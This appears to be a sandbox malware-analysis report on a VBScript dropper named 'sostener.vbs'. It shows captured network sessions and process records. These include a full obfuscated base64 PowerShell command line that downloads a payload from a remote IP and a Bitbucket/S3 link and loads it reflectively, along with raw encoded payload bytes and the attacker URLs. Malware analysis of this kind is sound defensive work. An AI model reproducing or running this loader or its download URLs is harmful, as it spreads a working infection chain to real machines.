Nov 20, 2024 09:36:10.858891964 CET | 1236 | IN | Data Raw: 45 24 24 24 24 24 24 24 24 49 24 24 45 24 24 24 24 24 24 51 24 24 24 24 24 24 44 75 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 42 24 24 24 24 24 24 42 24 24 4c 6e 4a 6c 62 47 39 6a
                                                                                                      Data Ascii: E$$$$$$$$I$$E$$$$$$Q$$$$$$Du$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$B$$$$$$B$$LnJlbG9j$$$$$$M$$$$$$$$$$E$$B$$$$$$C$$$$$$$$8g$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Q$$$$$$Qg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$BQCgE$$$$$$$$$$$$Eg$$$$$$$$C$$$$U$$WKg
                                                                                                      Nov 20, 2024 09:36:10.858975887 CET448INData Raw: 42 51 43 46 43 6a 70 24 24 24 24 24 24 47 64 24 24 63 24 24 24 24 24 24 45 71 24 24 42 4d 77 24 24 67 24 24 64 24 24 24 24 24 24 24 24 24 24 67 24 24 24 24 45 51 24 24 43 6a 24 24 45 24 24 24 24 42 73 55 2f 67 45 4c 42 79 77 49 4b 24 24 45 24 24
                                                                                                      Data Ascii: BQCFCjp$$$$$$Gd$$c$$$$$$Eq$$BMw$$g$$d$$$$$$$$$$g$$$$EQ$$Cj$$E$$$$BsU/gELBywIK$$E$$$$CsKKwU$$$$gor$$$$YqJg$$D/hUB$$$$$$bKiY$$$$igP$$$$$$K$$Co$$$$$$$$TM$$Q$$L$$$$$$$$$$E$$$$BEg69I8$$CgG$$$$$$Kbwc$$$$$$oCKBE$$$$$$pvCQ$$$$CigK$$$$$$K$$hQo6Q$$$$BqU
                                                                                                      Nov 20, 2024 09:36:10.858987093 CET1236INData Raw: 24 24 24 24 24 45 6c 46 67 4b 69 43 69 43 55 30 7a 77 24 24 46 42 51 47 4b 4f 6b 24 24 24 24 24 24 59 6d 4b 67 24 24 24 24 45 7a 24 24 45 24 24 24 24 38 24 24 24 24 24 24 24 24 42 24 24 24 24 24 24 52 49 4b 33 54 50 24 24 24 24 55 46 42 51 6f 36
                                                                                                      Data Ascii: $$$$$ElFgKiCiCU0zw$$FBQGKOk$$$$$$YmKg$$$$Ez$$E$$$$8$$$$$$$$B$$$$$$RIK3TP$$$$UFBQo6Q$$$$BiYqHgIoFw$$$$Cio$$Ez$$E$$BM$$$$$$$$B$$$$$$RIMrTP$$$$UFBQo6Q$$$$BnQI$$$$$$CKg$$TM$$Q$$Ew$$$$$$$$E$$$$BEgitI8$$BQUFCjp$$$$$$Gd$$g$$$$$$IqHgIoDw$$$$Cio$$Ez$$E
                                                                                                      Nov 20, 2024 09:36:10.859071016 CET1236INData Raw: 38 24 24 24 24 24 24 6f 43 4b 44 24 24 24 24 24 24 24 24 5a 39 4a 67 24 24 24 24 42 24 24 4a 7a 48 24 24 24 24 24 24 43 6e 30 6e 24 24 24 24 24 24 45 4b 6c 34 43 24 24 78 38 59 59 79 67 75 24 24 24 24 24 24 47 24 24 79 44 2f 2f 2f 38 24 24 58 32
                                                                                                      Data Ascii: 8$$$$$$oCKD$$$$$$$$Z9Jg$$$$B$$JzH$$$$$$Cn0n$$$$$$EKl4C$$x8YYygu$$$$$$G$$yD///8$$X28+$$$$$$GKg$$bM$$Q$$vwE$$$$$$Q$$$$BEDL$$MXKwMWKw$$tBwJ7Jg$$$$BCoCeyc$$$$$$QDj$$Q$$$$$$FvHQ$$$$CnQT$$$$$$CCgYs$$xcr$$xYr$$DqG$$Q$$$$$$nsm$$$$$$E$$29$$$$$$$$GCwcs$
                                                                                                      Nov 20, 2024 09:36:10.859082937 CET1236INData Raw: 24 24 24 67 43 48 24 24 24 24 75 53 24 24 42 51 24 24 24 24 24 24 24 24 24 24 45 7a 24 24 43 24 24 49 51 24 24 24 24 24 24 24 24 47 24 24 24 24 24 24 52 24 24 43 67 76 24 24 24 24 24 24 4b 43 69 73 57 43 55 55 45 24 24 24 24 24 24 24 24 42 24 24
                                                                                                      Data Ascii: $$$gCH$$$$uS$$BQ$$$$$$$$$$Ez$$C$$IQ$$$$$$$$G$$$$$$R$$Cgv$$$$$$KCisWCUUE$$$$$$$$B$$$$$$$$Bg$$$$$$$$i$$$$$$$$Lg$$$$$$BcNK+Z+JQ$$$$BCCd$$$$$$$$bzk$$$$$$YMG$$0r0igq$$$$$$GCxYNK8gIKD$$$$$$$$osBxkNK7wXKwMWKw$$tC$$YIbzE$$$$$$oLBywDFisDFys$$LQcHKDE$$$
                                                                                                      Nov 20, 2024 09:36:10.859095097 CET1236INData Raw: 77 6b 54 45 7a 68 74 2f 76 2f 2f 46 68 4d 50 48 52 4d 54 4f 47 4c 2b 2f 2f 38 52 45 53 77 30 48 77 34 54 45 7a 68 56 2f 76 2f 2f 30 24 24 55 24 24 24 24 24 24 45 6f 43 24 24 24 24 24 24 43 6e 4b 6c 24 24 51 42 77 48 7a 51 55 46 6f 30 46 24 24 24
                                                                                                      Data Ascii: wkTEzht/v//FhMPHRMTOGL+//8RESw0Hw4TEzhV/v//0$$U$$$$$$EoC$$$$$$CnKl$$QBwHzQUFo0F$$$$$$BFCg5$$$$$$KEwUZExM4Lf7//xYr$$xcr$$C1$$ERBvPQ$$$$CiwDFisDFys$$LS8REY5pFzMoEREWmm8+$$$$$$Kbz8$$$$$$pyvwE$$cCh$$$$$$$$KL$$MWKwMXKw$$tBhEQEwgrEREPF1gTDxEPEQ6OaT9
                                                                                                      Nov 20, 2024 09:36:10.859107018 CET1236INData Raw: 24 24 24 24 24 6f 52 42 6d 39 4d 24 24 24 24 24 24 4b 24 24 6e 35 4e 24 24 24 24 24 24 4b 62 30 63 24 24 24 24 24 24 6f 66 46 52 4d 53 4f 4e 76 39 2f 2f 38 43 66 6b 6f 24 24 24 24 24 24 70 76 52 77 24 24 24 24 43 67 4a 2b 53 77 24 24 24 24 43 68
                                                                                                      Data Ascii: $$$$$oRBm9M$$$$$$K$$n5N$$$$$$Kb0c$$$$$$ofFRMSONv9//8Cfko$$$$$$pvRw$$$$CgJ+Sw$$$$ChEGb0w$$$$$$oCfk0$$$$$$pvRw$$$$ChsTEjiw/f//$$n5L$$$$$$KEQdvT$$$$$$CgJ+Wg$$$$ChENb1E$$$$$$oCEQpvWQ$$$$ChwTEjiG/f//$$n5L$$$$$$KEQRvT$$$$$$CgJ+Ww$$$$Cm9H$$$$$$K$$n5c
                                                                                                      Nov 20, 2024 09:36:10.859333038 CET1236INData Raw: 42 63 4b 4f 47 72 2f 2f 2f 38 71 45 7a 24 24 45 24 24 47 55 24 24 24 24 24 24 24 24 4a 24 24 24 24 24 24 52 24 24 24 24 49 6f 44 77 24 24 24 24 43 67 49 45 46 68 64 7a 5a 51 24 24 24 24 43 6e 4e 6d 24 24 24 24 24 24 4b 66 54 77 24 24 24 24 24 24
                                                                                                      Data Ascii: BcKOGr///8qEz$$E$$GU$$$$$$$$J$$$$$$R$$$$IoDw$$$$CgIEFhdzZQ$$$$CnNm$$$$$$KfTw$$$$$$QrGgZFBQ$$$$$$$$Q$$$$$$$$O$$$$$$$$GQ$$$$$$CQ$$$$$$$$u$$$$$$$$Fwor4gIoZw$$$$ChoKK9gC$$31B$$$$$$EG$$orzQIoRw$$$$BiYZCivCBChn$$$$$$KFgoruCo$$$$$$$$TM$$Q$$FwI$$$$$$o
                                                                                                      Nov 20, 2024 09:36:10.859350920 CET1236INData Raw: 55 45 24 24 24 24 24 24 24 24 42 24 24 24 24 24 24 24 24 42 45 24 24 24 24 24 24 24 24 59 24 24 24 24 24 24 24 24 4b 67 24 24 24 24 24 24 42 63 4d 4b 2b 59 43 65 30 24 24 24 24 24 24 24 24 51 47 6d 67 73 59 44 43 76 5a 42 69 77 74 46 67 77 72 30
                                                                                                      Data Ascii: UE$$$$$$$$B$$$$$$$$BE$$$$$$$$Y$$$$$$$$Kg$$$$$$BcMK+YCe0$$$$$$$$QGmgsYDCvZBiwtFgwr0gdvsg$$$$BgMoQ$$$$$$CiwHGQwrwBYr$$xcr$$C0LBwYXWG+x$$$$$$GByoGF1gKBgJ7Q$$$$$$BI5pMrgUKpICe0$$$$$$$$Qs$$xcr$$xYr$$C0CFCoCe0$$$$$$$$QDF1maJQNvsQ$$$$BioTM$$I$$Gw$$$$
                                                                                                      Nov 20, 2024 09:36:10.866863012 CET1236INData Raw: 59 62 32 73 24 24 24 24 24 24 6f 6d 24 24 6e 73 38 24 24 24 24 24 24 45 62 33 45 24 24 24 24 24 24 6f 67 75 72 34 24 24 24 24 53 34 43 46 69 6f 43 65 7a 77 24 24 24 24 24 24 52 76 61 67 24 24 24 24 43 6d 6f 4b 4b 79 63 52 42 45 55 49 24 24 24 24
                                                                                                      Data Ascii: Yb2s$$$$$$om$$ns8$$$$$$Eb3E$$$$$$ogur4$$$$S4CFioCezw$$$$$$Rvag$$$$CmoKKycRBEUI$$$$$$$$BQ$$$$$$BE$$$$$$$$j$$$$$$$$Lw$$$$$$Ds$$$$$$BH$$$$$$$$X$$$$$$$$HE$$$$$$$$bEwQr1$$IGKE0$$$$$$YdEwQry$$J7P$$$$$$BG9q$$$$$$KagwcEwQrtgIHKEo$$$$$$YWEwQrqgIJKEg$$$


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      1  192.168.2.7  49726  91.202.233.169  80  7104  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Nov 20, 2024 09:36:18.938357115 CET  96  OUT  GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1
                                                                                                      Host: 91.202.233.169
                                                                                                      Connection: Keep-Alive
                                                                                                      Nov 20, 2024 09:36:19.642822027 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                      Server: nginx/1.20.2
                                                                                                      Date: Wed, 20 Nov 2024 08:36:19 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 270652
                                                                                                      Connection: keep-alive
                                                                                                      Last-Modified: Mon, 28 Oct 2024 02:59:44 GMT
                                                                                                      ETag: "4213c-62580a923c800"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Vary: Accept-Encoding


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      2  192.168.2.7  49769  178.237.33.50  80  7536  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Nov 20, 2024 09:36:24.350171089 CET  71  OUT  GET /json.gp HTTP/1.1
                                                                                                      Host: geoplugin.net
                                                                                                      Cache-Control: no-cache
                                                                                                      Nov 20, 2024 09:36:24.973278046 CET  1170  IN  HTTP/1.1 200 OK
                                                                                                      date: Wed, 20 Nov 2024 08:36:24 GMT
                                                                                                      server: Apache
                                                                                                      content-length: 962
                                                                                                      content-type: application/json; charset=utf-8
                                                                                                      cache-control: public, max-age=300
                                                                                                      access-control-allow-origin: *
                                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      0  192.168.2.7  49737  185.166.143.49  443  7104  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      2024-11-20 08:36:20 UTC  110  OUT  GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1
                                                                                                      Host: bitbucket.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-11-20 08:36:21 UTC  5769  IN  HTTP/1.1 302 Found
                                                                                                      Date: Wed, 20 Nov 2024 08:36:21 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 0
                                                                                                      Server: AtlassianEdge
                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNE [TRUNCATED]
                                                                                                      Expires: Wed, 20 Nov 2024 08:36:21 GMT
                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                      X-Used-Mesh: False
                                                                                                      Vary: Accept-Language, Origin
                                                                                                      Content-Language: en
                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                      X-Dc-Location: Micros-3
                                                                                                      X-Served-By: 87806a2e7092
                                                                                                      X-Version: 8a5953c2822d
                                                                                                      X-Static-Version: 8a5953c2822d
                                                                                                      X-Request-Count: 2026
                                                                                                      X-Render-Time: 0.04147911071777344
                                                                                                      X-B3-Traceid: c138cafa24844290915ba566f6e52837
                                                                                                      X-B3-Spanid: f9940804bbb52345
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config- [TRUNCATED]
                                                                                                      X-Usage-Quota-Remaining: 999301.534
                                                                                                      X-Usage-Request-Cost: 710.77
                                                                                                      X-Usage-User-Time: 0.021323
                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                      X-Usage-Input-Ops: 0
                                                                                                      X-Usage-Output-Ops: 0
                                                                                                      Age: 0
                                                                                                      X-Cache: MISS
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                      Atl-Traceid: c138cafa24844290915ba566f6e52837
                                                                                                      Atl-Request-Id: c138cafa-2484-4290-915b-a566f6e52837
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                      Server-Timing: atl-edge;dur=151,atl-edge-internal;dur=3,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                      Connection: close


                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                      1  192.168.2.7  49747  52.217.196.57  443  7104  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      2024-11-20 08:36:21 UTC  1235  OUT  GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwg [TRUNCATED]
                                                                                                      Host: bbuseruploads.s3.amazonaws.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-11-20 08:36:22 UTC  527  IN  HTTP/1.1 200 OK
                                                                                                      x-amz-id-2: bLPMfv6UQb3STaxVzeneKmxycJoOyOTGqd1HNhk4VeVkD3zYiNVJzA14iie3+FdIzVuNkEjw7kQ=
                                                                                                      x-amz-request-id: 5Q8NBY110QCEPMAW
                                                                                                      Date: Wed, 20 Nov 2024 08:36:23 GMT
                                                                                                      Last-Modified: Tue, 19 Nov 2024 15:37:57 GMT
                                                                                                      ETag: "bc1f315918dbb41727df210bd2732eb2"
                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                      x-amz-version-id: J1n0anmS_6qIm97U5NPPILk9y5.Qa7NW
                                                                                                      Content-Disposition: attachment; filename="sos19nov.txt"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 657408
                                                                                                      Server: AmazonS3
                                                                                                      Connection: close



                                                                                                      Target ID:0
                                                                                                      Start time:03:36:04
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                                                                                      Imagebase:0x7ff6cb1c0000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:03:36:05
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:03:36:05
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:7
                                                                                                      Start time:03:36:08
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
